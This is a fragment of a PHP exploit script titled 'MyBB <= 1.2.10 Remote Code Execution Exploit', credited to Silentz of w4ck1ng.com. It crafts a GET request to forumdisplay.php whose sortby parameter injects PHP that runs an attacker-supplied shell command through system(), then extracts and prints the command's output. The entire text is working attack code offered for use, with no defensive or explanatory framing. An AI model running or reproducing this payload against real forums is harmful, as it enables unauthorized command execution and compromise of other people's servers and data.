#!/usr/bin/php -q -d short_open_tag=on '/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $sql = "forumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['"; $packet ="GET " . $path . $sql . " HTTP/1.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); $temp=explode("*",$html); $temp2=explode("*",$temp[1]); print "-------------------------------------------------------------------------\r\n"; print " MyBB <= 1.2.10 Remote Code Execution Exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; echo $temp2[0]; print "-------------------------------------------------------------------------\r\n"; print " http://www.w4ck1ng.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; ?>